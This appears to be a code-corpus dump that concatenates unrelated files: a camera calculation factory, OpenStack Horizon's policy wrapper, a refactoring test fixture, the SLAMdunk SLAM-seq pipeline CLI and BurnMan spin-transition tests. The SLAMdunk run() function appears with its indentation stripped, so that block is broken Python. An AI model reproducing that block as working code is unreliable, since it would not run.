        WEPCalculationOfComCam
            Concrete child class of WEPCalculation class.

        Raises
        ------
        ValueError
            This camera type is not supported.
        """
        # Dispatch table: camera type -> concrete calculation class.
        calculators = {
            CamType.LsstCam: WEPCalculationOfLsstCam,
            CamType.LsstFamCam: WEPCalculationOfLsstFamCam,
            CamType.ComCam: WEPCalculationOfComCam,
        }
        if camType not in calculators:
            raise ValueError("This camera type is not supported.")
        return calculators[camType](isrDir)
# This module has no standalone behaviour; it is import-only.
if __name__ == "__main__":
    pass
|
Solinea/horizon
|
refs/heads/master
|
openstack_dashboard/policy.py
|
55
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
def check(actions, request, target=None):
    """Wrapper of the configurable policy method.

    Delegates to ``settings.POLICY_CHECK_FUNCTION`` when one is configured;
    otherwise every check is allowed.
    """
    checker = getattr(settings, "POLICY_CHECK_FUNCTION", None)
    if not checker:
        # No policy backend configured: allow everything.
        return True
    return checker(actions, request, target)
class PolicyTargetMixin(object):
    """Mixin providing get_policy_target for policy checks.

    ``policy_target_attrs`` maps keys in the policy target dict to attribute
    names on the passed datum object. Sub-classes may override the tuple to
    declare their own mapping without re-implementing get_policy_target.
    """
    policy_target_attrs = (("project_id", "tenant_id"),
                           ("user_id", "user_id"),
                           ("domain_id", "domain_id"))

    def get_policy_target(self, request, datum=None):
        # Without a datum every target attribute is unknown (None).
        if not datum:
            return {attr: None for attr, _ in self.policy_target_attrs}
        # Missing attributes on the datum also resolve to None.
        return {attr: getattr(datum, source, None)
                for attr, source in self.policy_target_attrs}
|
da1z/intellij-community
|
refs/heads/master
|
python/testData/refactoring/move/docstringTypes/before/src/c.py
|
83
|
def f(x):
    '''Returns the argument.
    :type x: a.C
    :rtype: a.C
    '''
    result = x
    return result
|
t-neumann/slamdunk
|
refs/heads/master
|
slamdunk/slamdunk.py
|
1
|
#!/usr/bin/env python
# Copyright (c) 2015 Tobias Neumann, Philipp Rescheneder.
#
# This file is part of Slamdunk.
#
# Slamdunk is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Slamdunk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#########################################################################
# Main routine for the SLAMdunk analyzer
#########################################################################
# Imports
#########################################################################
from __future__ import print_function
import sys, os, random
from time import sleep
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, SUPPRESS
from os.path import basename
from joblib import Parallel, delayed
from slamdunk.dunks import tcounter, mapper, filter, deduplicator, snps
from slamdunk.utils.misc import replaceExtension, estimateMaxReadLength
from slamdunk.version import __version__
########################################################################
# Global variables
########################################################################
# Module-wide run state, read by the logging/progress helpers below.
printOnly = False        # forwarded to mapper/filter/snps -- presumably prints commands instead of running them; confirm in dunks
verbose = False          # verbosity flag forwarded to the dunk implementations and joblib's Parallel
mainOutput = sys.stderr  # stream used by message()/error()/stepFinished()/dunkFinished()
logToMainOutput = False  # when True, getLogFile() returns mainOutput instead of opening a per-step log file
########################################################################
# Routine definitions
########################################################################
def getLogFile(path):
    """Return the log destination: the shared main output stream when
    logToMainOutput is set, otherwise a file opened for appending at *path*."""
    if logToMainOutput:
        return mainOutput
    return open(path, "a")
def closeLogFile(log):
    """Close *log* unless it is the shared main output stream."""
    if logToMainOutput:
        return
    log.close()
def message(msg):
    """Print a status line to the main output stream."""
    print(msg, file=mainOutput)
def error(msg, code=-1):
    """Print *msg* to the main output stream, then terminate with *code*."""
    print(msg, file=mainOutput)
    sys.exit(code)
def stepFinished():
    """Emit one progress dot (no newline) to the main output stream."""
    print(".", file=mainOutput, end="")
def dunkFinished():
    """Terminate the current progress-dot line with a newline."""
    print("", file=mainOutput)
def createDir(directory):
    """Create *directory* (announcing it) if it does not exist yet."""
    if os.path.exists(directory):
        return
    message("Creating output directory: " + directory)
    os.makedirs(directory)
def readSampleFile(fileName):
    """Parse a sample sheet into parallel lists (samples, infos).

    Each data line needs at least four columns: column 1 is the sample file
    path; columns 2-4 are joined into a "name:type:time" info string.
    Tab- vs comma-separated is decided by the .tsv/.csv extension.

    Raises RuntimeError for an unknown extension (only when a data line is
    actually encountered) or for a line with fewer than four columns.
    """
    samples, infos = [], []
    with open(fileName, "r") as handle:
        for raw in handle:
            entry = raw.strip()
            # Skip blank / near-empty lines.
            if len(entry) <= 1:
                continue
            if fileName.endswith(".tsv"):
                fields = entry.split("\t")
            elif fileName.endswith(".csv"):
                fields = entry.split(",")
            else:
                raise RuntimeError("Unknown file extension found: " + fileName)
            if len(fields) < 4:
                raise RuntimeError("Invalid sample file found: " + fileName)
            samples.append(fields[0])
            infos.append(fields[1] + ":" + fields[2] + ":" + fields[3])
    return samples, infos
def getSamples(bams, runOnly=-1):
    """Resolve the input file list into (samples, samplesInfos).

    A single .tsv/.csv argument is treated as a sample sheet (see
    readSampleFile); anything else is taken as a plain list of BAM files
    with empty info strings. When *runOnly* is a positive 1-based index,
    only that single sample (and its info) is returned.

    Raises RuntimeError when *runOnly* is 0 or exceeds the sample count.
    """
    if len(bams) == 1 and bams[0].endswith((".tsv", ".csv")):
        # Sample sheet specified
        samples, samplesInfos = readSampleFile(bams[0])
    else:
        # Plain list of BAM files specified
        samples = bams
        samplesInfos = [""] * len(samples)

    if runOnly == 0:
        raise RuntimeError("Sample index (" + str(runOnly) + ") out of range. Starts with 1. Check -i/--sample-index")
    if runOnly > 0:
        if runOnly > len(samples):
            raise RuntimeError("Sample index out of range. " + str(runOnly) + " > " + str(len(samples)) + ". Check -i/--sample-index")
        message("Running only job " + str(runOnly))
        samples = [samples[runOnly - 1]]
        samplesInfos = [samplesInfos[runOnly - 1]]
    return samples, samplesInfos
def runMap(tid, inputBAM, referenceFile, threads, trim5p, maxPolyA, quantseqMapping, endtoendMapping, topn, sampleDescription, outputDirectory, skipSAM) :
    """Map one sample against *referenceFile* via mapper.Map.

    *sampleDescription* is an optional "name:type:time" triple; missing
    parts fall back to the BAM basename, "NA" and "-1". When *skipSAM* is
    set the mapper writes a BAM directly, so runAll skips the sam2bam step.
    """
    if skipSAM:
        # Write BAM straight away instead of an intermediate SAM.
        outputSAM = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".bam", "_slamdunk_mapped"))
    else:
        outputSAM = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".sam", "_slamdunk_mapped"))
    outputLOG = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".log", "_slamdunk_mapped"))
    #sampleName = "sample_" + str(tid)
    # Defaults when no description (or a partial one) is supplied.
    sampleName = replaceExtension(basename(inputBAM), ".bam", "")
    sampleType = "NA"
    sampleTime = "-1"
    if(sampleDescription != ""):
        sampleDescriptions = sampleDescription.split(":")
        if(len(sampleDescriptions) >= 1):
            sampleName = sampleDescriptions[0]
        if(len(sampleDescriptions) >= 2):
            # Expand one-letter shorthands; unrecognised values pass through as-is.
            typeDict = { 'p': 'pulse', 'c':'chase', 'pulse':'pulse', 'chase':'chase', '':'NA'}
            if sampleDescriptions[1] in typeDict:
                sampleType = typeDict[sampleDescriptions[1]]
            else:
                sampleType = sampleDescriptions[1]
        if(len(sampleDescriptions) >= 3):
            sampleTime = sampleDescriptions[2]
    mapper.Map(inputBAM, referenceFile, outputSAM, getLogFile(outputLOG), quantseqMapping, endtoendMapping, threads=threads, trim5p=trim5p, maxPolyA=maxPolyA, topn=topn, sampleId=tid, sampleName=sampleName, sampleType=sampleType, sampleTime=sampleTime, printOnly=printOnly, verbose=verbose)
    stepFinished()
def runSam2Bam(tid, bam, threads, outputDirectory):
    """Sort the mapped SAM for *bam* into a BAM, logging to a sidecar file."""
    base = basename(bam)
    inputSAM = os.path.join(outputDirectory, replaceExtension(base, ".sam", "_slamdunk_mapped"))
    outputBAM = os.path.join(outputDirectory, replaceExtension(base, ".bam", "_slamdunk_mapped"))
    outputLOG = os.path.join(outputDirectory, replaceExtension(base, ".log", "_slamdunk_mapped"))
    mapper.sort(inputSAM, outputBAM, getLogFile(outputLOG), threads, False, printOnly, verbose)
    stepFinished()
def runDedup(tid, bam, outputDirectory) :
    """Deduplicate *bam* into a _dedup BAM, closing the step log afterwards."""
    base = basename(bam)
    outputBAM = os.path.join(outputDirectory, replaceExtension(base, ".bam", "_dedup"))
    log = getLogFile(os.path.join(outputDirectory, replaceExtension(base, ".log", "_dedup")))
    deduplicator.Dedup(bam, outputBAM, log)
    closeLogFile(log)
    stepFinished()
def runFilter(tid, bam, bed, mq, minIdentity, maxNM, outputDirectory):
    """Filter alignments in *bam* by mapping quality, identity and NM,
    writing a _filtered BAM and log into *outputDirectory*."""
    base = basename(bam)
    outputBAM = os.path.join(outputDirectory, replaceExtension(base, ".bam", "_filtered"))
    outputLOG = os.path.join(outputDirectory, replaceExtension(base, ".log", "_filtered"))
    filter.Filter(bam, outputBAM, getLogFile(outputLOG), bed, mq, minIdentity, maxNM, printOnly, verbose)
    stepFinished()
def runSnp(tid, referenceFile, minCov, minVarFreq, minQual, inputBAM, outputDirectory) :
    """Call SNPs on *inputBAM*, writing a _snp VCF and log into *outputDirectory*."""
    base = basename(inputBAM)
    outputSNP = os.path.join(outputDirectory, replaceExtension(base, ".vcf", "_snp"))
    outputLOG = os.path.join(outputDirectory, replaceExtension(base, ".log", "_snp"))
    snps.SNPs(inputBAM, outputSNP, referenceFile, minVarFreq, minCov, minQual, getLogFile(outputLOG), printOnly, verbose, False)
    stepFinished()
def runCount(tid, bam, ref, bed, maxLength, minQual, conversionThreshold, outputDirectory, snpDirectory, vcfFile) :
    """Count T->C conversions for one BAM, writing tcount TSV and +/- strand
    bedgraph files.

    SNP masking precedence: an explicit *vcfFile*, else the per-sample VCF
    from *snpDirectory*, else none. Returns the path of the tcount TSV.
    """
    outputCSV = os.path.join(outputDirectory, replaceExtension(basename(bam), ".tsv", "_tcount"))
    outputBedgraphPlus = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bedgraph", "_tcount_plus"))
    outputBedgraphMinus = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bedgraph", "_tcount_mins"))
    outputLOG = os.path.join(outputDirectory, replaceExtension(basename(bam), ".log", "_tcount"))

    # Idiom fix: identity comparisons with None (was `!= None` / `== None`).
    if vcfFile is not None:
        inputSNP = vcfFile
    elif snpDirectory is not None:
        inputSNP = os.path.join(snpDirectory, replaceExtension(basename(bam), ".vcf", "_snp"))
    else:
        inputSNP = None

    if maxLength is None:
        # Estimate from the BAM; a negative result signals that read lengths
        # vary too much to pick a safe maximum.
        maxLength = estimateMaxReadLength(bam)
        if maxLength < 0:
            # NOTE(review): this aborts the run but exits with status 0; a
            # non-zero code may be intended -- confirm before changing.
            print("Difference between minimum and maximum read length is > 10. Please specify --max-read-length parameter.")
            sys.exit(0)

    log = getLogFile(outputLOG)
    print("Using " + str(maxLength) + " as maximum read length.",file=log)
    tcounter.computeTconversions(ref, bed, inputSNP, bam, maxLength, minQual, outputCSV, outputBedgraphPlus, outputBedgraphMinus, conversionThreshold, log)
    stepFinished()
    return outputCSV
def runAll(args) :
    """Run the full slamdunk pipeline: map -> sam2bam -> filter -> (snp) -> count.

    When --sample-index is given only that one sample is processed and the
    start is jittered by a random sub-2s sleep -- presumably to stagger
    cluster jobs; confirm against the scheduler setup.
    """
    message("slamdunk all")
    if args.sampleIndex > -1:
        sec = random.randrange(200,2000) / 1000.0
        message("Waiting " + str(sec) + " seconds")
        sleep(sec)
    # Setup slamdunk run folder
    outputDirectory = args.outputDir
    createDir(outputDirectory)
    n = args.threads
    referenceFile = args.referenceFile
    # Run mapper dunk
    dunkPath = os.path.join(outputDirectory, "map")
    createDir(dunkPath)
    samples, samplesInfos = getSamples(args.files, runOnly=args.sampleIndex)
    message("Running slamDunk map for " + str(len(samples)) + " files (" + str(n) + " threads)")
    for i in range(0, len(samples)):
        bam = samples[i]
        # A user-supplied sample name only applies when mapping a single file.
        if not args.sampleName or len(samples) > 1:
            sampleName = replaceExtension(basename(bam), "", "")
        else :
            sampleName = args.sampleName
        sampleInfo = samplesInfos[i]
        if sampleInfo == "":
            sampleInfo = sampleName + ":" + args.sampleType + ":" + str(args.sampleTime)
        tid = i
        if args.sampleIndex > -1:
            tid = args.sampleIndex
        runMap(tid, bam, referenceFile, n, args.trim5, args.maxPolyA, args.quantseq, args.endtoend, args.topn, sampleInfo, dunkPath, args.skipSAM)
    dunkFinished()
    if(not args.skipSAM):
        message("Running slamDunk sam2bam for " + str(len(samples)) + " files (" + str(n) + " threads)")
        # NOTE(review): n_jobs=1 serializes this step even though the message
        # advertises n threads (sorting itself receives n) -- confirm intent.
        results = Parallel(n_jobs=1, verbose=verbose)(delayed(runSam2Bam)(tid, samples[tid], n, dunkPath) for tid in range(0, len(samples)))
        dunkFinished()
    dunkbufferIn = []
    for file in samples :
        dunkbufferIn.append(os.path.join(dunkPath, replaceExtension(basename(file), ".bam", "_slamdunk_mapped")))
    # Run filter dunk
    bed = args.bed
    if args.filterbed:
        # An explicit filter BED implies multimapper reconciliation.
        bed = args.filterbed
        args.multimap = True
    if (not args.multimap) :
        bed = None
    dunkPath = os.path.join(outputDirectory, "filter")
    createDir(dunkPath)
    message("Running slamDunk filter for " + str(len(samples)) + " files (" + str(n) + " threads)")
    results = Parallel(n_jobs=n, verbose=verbose)(delayed(runFilter)(tid, dunkbufferIn[tid], bed, args.mq, args.identity, args.nm, dunkPath) for tid in range(0, len(samples)))
    dunkFinished()
    # Collect the filtered BAM paths as input for the following dunks
    dunkbufferOut = []
    for file in dunkbufferIn :
        dunkbufferOut.append(os.path.join(dunkPath, replaceExtension(basename(file), ".bam", "_filtered")))
    dunkbufferIn = dunkbufferOut
    dunkbufferOut = []
    dunkFinished()
    # Run snps dunk only if vcf not specified
    snpDirectory = None
    vcfFile = None
    if not "vcfFile" in args:
        dunkPath = os.path.join(outputDirectory, "snp")
        createDir(dunkPath)
        minCov = args.cov
        minVarFreq = args.var
        # Use half the workers for SNP calling (presumably heavier per job
        # than the other dunks -- confirm).
        snpThread = n
        if(snpThread > 1):
            snpThread = int(snpThread / 2)
        #if (args.minQual == 0) :
        #    snpqual = 13
        #else :
        snpqual = args.minQual
        message("Running slamDunk SNP for " + str(len(samples)) + " files (" + str(snpThread) + " threads)")
        results = Parallel(n_jobs=snpThread, verbose=verbose)(delayed(runSnp)(tid, referenceFile, minCov, minVarFreq, snpqual, dunkbufferIn[tid], dunkPath) for tid in range(0, len(samples)))
        snpDirectory = os.path.join(outputDirectory, "snp")
        dunkFinished()
    else :
        vcfFile = args.vcfFile
    # Run count dunk
    dunkPath = os.path.join(outputDirectory, "count")
    createDir(dunkPath)
    message("Running slamDunk tcount for " + str(len(samples)) + " files (" + str(n) + " threads)")
    results = Parallel(n_jobs=n, verbose=verbose)(delayed(runCount)(tid, dunkbufferIn[tid], referenceFile, args.bed, args.maxLength, args.minQual, args.conversionThreshold, dunkPath, snpDirectory, vcfFile) for tid in range(0, len(samples)))
    dunkFinished()
def run():
########################################################################
# Argument parsing
########################################################################
# Info
usage = "SLAMdunk software for analyzing SLAM-seq data"
# Main Parsers
parser = ArgumentParser(description=usage, formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
# Initialize Subparsers
subparsers = parser.add_subparsers(help="", dest="command")
# map command
mapparser = subparsers.add_parser('map', help='Map SLAM-seq read data', formatter_class=ArgumentDefaultsHelpFormatter)
mapparser.add_argument('files', action='store', help='Single csv/tsv file (recommended) containing all sample files and sample info or a list of all sample BAM/FASTA(gz)/FASTQ(gz) files' , nargs="+")
mapparser.add_argument("-r", "--reference", type=str, required=True, dest="referenceFile", default=SUPPRESS, help="Reference fasta file")
mapparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", default=SUPPRESS, help="Output directory for mapped BAM files.")
mapparser.add_argument("-5", "--trim-5p", type=int, required=False, dest="trim5", default=12, help="Number of bp removed from 5' end of all reads.")
mapparser.add_argument("-n", "--topn", type=int, required=False, dest="topn", default=1, help="Max. number of alignments to report per read")
mapparser.add_argument("-a", "--max-polya", type=int, required=False, dest="maxPolyA", default=4, help="Max number of As at the 3' end of a read.")
mapparser.add_argument("-t", "--threads", type=int, required=False, dest="threads", default = 1, help="Thread number")
mapparser.add_argument("-q", "--quantseq", dest="quantseq", action='store_true', required=False, help="Run plain Quantseq alignment without SLAM-seq scoring")
mapparser.add_argument('-e', "--endtoend", action='store_true', dest="endtoend", help="Use a end to end alignment algorithm for mapping.")
mapparser.add_argument('-sn', "--sampleName", type=str, dest="sampleName", required = False, help="Use this sample name for all supplied samples")
mapparser.add_argument('-sy', "--sampleType", type=str, dest="sampleType", required = False, default = "pulse", help="Use this sample type for all supplied samples")
mapparser.add_argument('-st', "--sampleTime", type=int, dest="sampleTime", required = False, default = 0, help="Use this sample time for all supplied samples")
mapparser.add_argument("-i", "--sample-index", type=int, required=False, default=-1, dest="sampleIndex", help="Run analysis only for sample <i>. Use for distributing slamdunk analysis on a cluster (index is 1-based).")
mapparser.add_argument('-ss', "--skip-sam", action='store_true', dest="skipSAM", help="Output BAM while mapping. Slower but, uses less hard disk.")
# filter command
filterparser = subparsers.add_parser('filter', help='Filter SLAM-seq aligned data')
filterparser.add_argument('bam', action='store', help='Bam file(s)' , nargs="+")
filterparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", help="Output directory for mapped BAM files.")
filterparser.add_argument("-b", "--bed", type=str, required=False, dest="bed", help="BED file, overrides MQ filter to 0")
filterparser.add_argument("-mq", "--min-mq", type=int, required=False, default=2, dest="mq", help="Minimum mapping quality (default: %(default)d)")
filterparser.add_argument("-mi", "--min-identity", type=float, required=False, default=0.95, dest="identity", help="Minimum alignment identity (default: %(default)s)")
filterparser.add_argument("-nm", "--max-nm", type=int, required=False, default=-1, dest="nm", help="Maximum NM for alignments (default: %(default)d)")
filterparser.add_argument("-t", "--threads", type=int, required=False, dest="threads", default=1, help="Thread number (default: %(default)d)")
# snp command
snpparser = subparsers.add_parser('snp', help='Call SNPs on SLAM-seq aligned data', formatter_class=ArgumentDefaultsHelpFormatter)
snpparser.add_argument('bam', action='store', help='Bam file(s)' , nargs="+")
snpparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", default=SUPPRESS, help="Output directory for mapped BAM files.")
snpparser.add_argument("-r", "--reference", required=True, dest="fasta", type=str, default=SUPPRESS, help="Reference fasta file")
snpparser.add_argument("-c", "--min-coverage", required=False, dest="cov", type=int, help="Minimimum coverage to call variant", default=10)
#snpparser.add_argument("-q", "--min-base-qual", type=int, default=13, required=False, dest="minQual", help="Min base quality for T -> C conversions (default: %(default)d)")
snpparser.add_argument("-f", "--var-fraction", required=False, dest="var", type=float, help="Minimimum variant fraction to call variant", default=0.8)
snpparser.add_argument("-t", "--threads", type=int, required=False, default=1, dest="threads", help="Thread number")
# count command
countparser = subparsers.add_parser('count', help='Count T/C conversions in SLAM-seq aligned data')
countparser.add_argument('bam', action='store', help='Bam file(s)' , nargs="+")
countparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", default=SUPPRESS, help="Output directory for mapped BAM files.")
countparser.add_argument("-s", "--snp-directory", type=str, required=False, dest="snpDir", default=SUPPRESS, help="Directory containing SNP files.")
countparser.add_argument("-v", "--vcf", type=str, required=False, dest="vcfFile", default=SUPPRESS, help="Externally provided custom variant file.")
countparser.add_argument("-r", "--reference", type=str, required=True, dest="ref", default=SUPPRESS, help="Reference fasta file")
countparser.add_argument("-b", "--bed", type=str, required=True, dest="bed", default=SUPPRESS, help="BED file")
countparser.add_argument("-c", "--conversion-threshold", type=int, dest="conversionThreshold", required=False, default=1,help="Number of T>C conversions required to count read as T>C read (default: %(default)d)")
countparser.add_argument("-l", "--max-read-length", type=int, required=False, dest="maxLength", help="Max read length in BAM file")
countparser.add_argument("-q", "--min-base-qual", type=int, default=27, required=False, dest="minQual", help="Min base quality for T -> C conversions (default: %(default)d)")
countparser.add_argument("-t", "--threads", type=int, required=False, default=1, dest="threads", help="Thread number (default: %(default)d)")
# all command
allparser = subparsers.add_parser('all', help='Run entire SLAMdunk analysis')
allparser.add_argument('files', action='store', help='Single csv/tsv file (recommended) containing all sample files and sample info or a list of all sample BAM/FASTA(gz)/FASTQ(gz) files' , nargs="+")
allparser.add_argument("-r", "--reference", type=str, required=True, dest="referenceFile", help="Reference fasta file")
allparser.add_argument("-b", "--bed", type=str, required=True, dest="bed", help="BED file with 3'UTR coordinates")
allparser.add_argument("-fb", "--filterbed", type=str, required=False, dest="filterbed", help="BED file with 3'UTR coordinates to filter multimappers (activates -m)")
allparser.add_argument("-v", "--vcf", type=str, required=False, dest="vcfFile", default=SUPPRESS, help="Skip SNP step and provide custom variant file.")
allparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", help="Output directory for slamdunk run.")
allparser.add_argument("-5", "--trim-5p", type=int, required=False, dest="trim5", default=12, help="Number of bp removed from 5' end of all reads (default: %(default)s)")
allparser.add_argument("-a", "--max-polya", type=int, required=False, dest="maxPolyA", default=4, help="Max number of As at the 3' end of a read (default: %(default)s)")
allparser.add_argument("-n", "--topn", type=int, required=False, dest="topn", default=1, help="Max. number of alignments to report per read (default: %(default)s)")
allparser.add_argument("-t", "--threads", type=int, required=False, default=1, dest="threads", help="Thread number (default: %(default)s)")
allparser.add_argument("-q", "--quantseq", dest="quantseq", action='store_true', required=False, help="Run plain Quantseq alignment without SLAM-seq scoring")
allparser.add_argument('-e', "--endtoend", action='store_true', dest="endtoend", help="Use a end to end alignment algorithm for mapping.")
allparser.add_argument('-m', "--multimap", action='store_true', dest="multimap", help="Use reference to resolve multimappers (requires -n > 1).")
allparser.add_argument("-mq", "--min-mq", type=int, required=False, default=2, dest="mq", help="Minimum mapping quality (default: %(default)s)")
allparser.add_argument("-mi", "--min-identity", type=float, required=False, default=0.95, dest="identity", help="Minimum alignment identity (default: %(default)s)")
allparser.add_argument("-nm", "--max-nm", type=int, required=False, default=-1, dest="nm", help="Maximum NM for alignments (default: %(default)s)")
allparser.add_argument("-mc", "--min-coverage", required=False, dest="cov", type=int, help="Minimimum coverage to call variant (default: %(default)s)", default=10)
allparser.add_argument("-mv", "--var-fraction", required=False, dest="var", type=float, help="Minimimum variant fraction to call variant (default: %(default)s)", default=0.8)
allparser.add_argument("-c", "--conversion-threshold", type=int, dest="conversionThreshold", required=False, default=1,help="Number of T>C conversions required to count read as T>C read (default: %(default)d)")
allparser.add_argument("-rl", "--max-read-length", type=int, required=False, dest="maxLength", help="Max read length in BAM file")
allparser.add_argument("-mbq", "--min-base-qual", type=int, default=27, required=False, dest="minQual", help="Min base quality for T -> C conversions (default: %(default)d)")
allparser.add_argument('-sn', "--sampleName", type=str, dest="sampleName", required = False, help="Use this sample name for all supplied samples")
allparser.add_argument('-sy', "--sampleType", type=str, dest="sampleType", required = False, default = "pulse", help="Use this sample type for all supplied samples")
allparser.add_argument('-st', "--sampleTime", type=int, dest="sampleTime", required = False, default = 0, help="Use this sample time for all supplied samples")
allparser.add_argument("-i", "--sample-index", type=int, required=False, default=-1, dest="sampleIndex", help="Run analysis only for sample <i>. Use for distributing slamdunk analysis on a cluster (index is 1-based).")
allparser.add_argument("-ss", "--skip-sam", action='store_true', dest="skipSAM", help="Output BAM while mapping. Slower but, uses less hard disk.")
args = parser.parse_args()
########################################################################
# Routine selection
########################################################################
command = args.command
if (command == "map") :
mapper.checkNextGenMapVersion()
outputDirectory = args.outputDir
if args.sampleIndex > -1:
sec = random.randrange(0,2000) / 1000
message("Waiting " + str(sec) + " seconds")
sleep(sec)
createDir(outputDirectory)
n = args.threads
referenceFile = args.referenceFile
samples, samplesInfos = getSamples(args.files, runOnly=args.sampleIndex)
message("Running slamDunk map for " + str(len(samples)) + " files (" + str(n) + " threads)")
for i in range(0, len(samples)):
bam = samples[i]
if not args.sampleName or len(samples) > 1:
sampleName = replaceExtension(basename(bam), "", "")
else :
sampleName = args.sampleName
sampleInfo = samplesInfos[i]
if sampleInfo == "":
sampleInfo = sampleName + ":" + args.sampleType + ":" + str(args.sampleTime)
tid = i
if args.sampleIndex > -1:
tid = args.sampleIndex
runMap(tid, bam, referenceFile, n, args.trim5, args.maxPolyA, args.quantseq, args.endtoend, args.topn, sampleInfo, outputDirectory, args.skipSAM)
dunkFinished()
if not args.skipSAM:
message("Running slamDunk sam2bam for " + str(len(samples)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=1, verbose=verbose)(delayed(runSam2Bam)(tid, samples[tid], n, outputDirectory) for tid in range(0, len(samples)))
dunkFinished()
elif (command == "filter") :
outputDirectory = args.outputDir
createDir(outputDirectory)
n = args.threads
message("Running slamDunk filter for " + str(len(args.bam)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runFilter)(tid, args.bam[tid], args.bed, args.mq, args.identity, args.nm, outputDirectory) for tid in range(0, len(args.bam)))
dunkFinished()
elif (command == "snp") :
outputDirectory = args.outputDir
createDir(outputDirectory)
fasta = args.fasta
minCov = args.cov
minVarFreq = args.var
#minQual = args.minQual
minQual = 15
n = args.threads
if(n > 1):
n = int(n / 2)
message("Running slamDunk SNP for " + str(len(args.bam)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runSnp)(tid, fasta, minCov, minVarFreq, minQual, args.bam[tid], outputDirectory) for tid in range(0, len(args.bam)))
dunkFinished()
elif (command == "count") :
outputDirectory = args.outputDir
createDir(outputDirectory)
if "snpDir" in args:
snpDirectory = args.snpDir
else :
snpDirectory = None
if "vcfFile" in args:
vcfFile = args.vcfFile
else :
vcfFile = None
n = args.threads
message("Running slamDunk tcount for " + str(len(args.bam)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runCount)(tid, args.bam[tid], args.ref, args.bed, args.maxLength, args.minQual, args.conversionThreshold, outputDirectory, snpDirectory, vcfFile) for tid in range(0, len(args.bam)))
dunkFinished()
elif (command == "all") :
runAll(args)
dunkFinished()
else:
parser.error("Too few arguments.")
# Script entry point: dispatch to the slamdunk command-line driver defined above.
if __name__ == '__main__':
    run()
|
QuLogic/burnman
|
refs/heads/master
|
tests/test_spin.py
|
1
|
import unittest
from util import BurnManTest
import os, sys
sys.path.insert(1,os.path.abspath('..'))
import burnman
from burnman import minerals
class spin_transition(BurnManTest):
    """Tests for the pressure-driven spin transition in ferropericlase."""

    def test_new(self):
        # Build the transitioning phase plus its pure high-spin and
        # low-spin end members.
        src = minerals.Murakami_etal_2012
        phases = [src.fe_periclase(), src.fe_periclase_HS(), src.fe_periclase_LS()]
        for phase in phases:
            phase.set_method('slb2')
        # High-spin regime: at low pressure the transitioning phase must
        # match the pure high-spin end member.
        for phase in phases:
            phase.set_state(5e9, 300)
        _, children = phases[0].unroll()
        self.assertFloatEqual(children[0].v_s(), phases[1].v_s())
        # Low-spin regime: at high pressure it must match the low-spin one.
        for phase in phases:
            phase.set_state(70e9, 300)
        _, children = phases[0].unroll()
        self.assertFloatEqual(children[0].v_s(), phases[2].v_s())

    def test_no_set_state(self):
        """unroll() selects the spin state implied by the current pressure."""
        phase = minerals.Murakami_etal_2012.fe_periclase()
        phase.set_state(5e9, 300)
        self.assertIsInstance(phase.unroll()[1][0],
                              minerals.Murakami_etal_2012.fe_periclase_HS)
        phase.set_state(70e9, 300)
        self.assertIsInstance(phase.unroll()[1][0],
                              minerals.Murakami_etal_2012.fe_periclase_LS)
class TestHelperSolidSolution(BurnManTest):
    """Check shear velocities of ferropericlase solid solutions at 5 GPa."""

    def test1(self):
        # Pinned snapshot values for two iron fractions, asserted in order.
        for iron_fraction, expected_vs in ((0.1, 5821.42007777),
                                           (0.7, 4061.92139873)):
            phase = minerals.other.ferropericlase(iron_fraction)
            phase.set_state(5e9, 300)
            self.assertFloatEqual(phase.v_s(), expected_vs)
class TestHelperFEdep(BurnManTest):
    # Regression test for P/T-dependent iron partitioning between
    # perovskite and ferropericlase; the asserted numbers are pinned
    # snapshots of earlier results.
    def test(self):
        # Bulk composition in weight fractions; Ca and Al excluded.
        weight_percents = {'Mg':0.213, 'Fe': 0.08, 'Si':0.27, 'Ca':0., 'Al':0.}
        Kd_0 = .59 #Fig 5 Nakajima et al 2012
        phase_fractions, relative_molar_percent = burnman. \
            calculate_phase_percents(weight_percents)
        # Partition coefficient as a function of pressure and temperature.
        iron_content = lambda p,t: burnman.calculate_partition_coefficient \
            (p,t,relative_molar_percent,Kd_0)
        rock = burnman.Composite([phase_fractions['pv'], phase_fractions['fp']],
                                 [minerals.SLB_2005.mg_fe_perovskite_pt_dependent(iron_content,0),
                                  minerals.SLB_2005.ferropericlase_pt_dependent(iron_content,1)])
        rock.set_state(5e9, 300)
        fractions, mins = rock.unroll()
        # Phase fractions and resolved mineral classes at 5 GPa / 300 K.
        self.assertArraysAlmostEqual(fractions, [0.9428714062806316, 0.057128593719368403])
        self.assertIsInstance(mins[0], minerals.SLB_2005.mg_fe_perovskite)
        self.assertIsInstance(mins[1], minerals.SLB_2005.ferropericlase)
        self.assertFloatEqual(mins[0].molar_mass(), 0.101752790682)
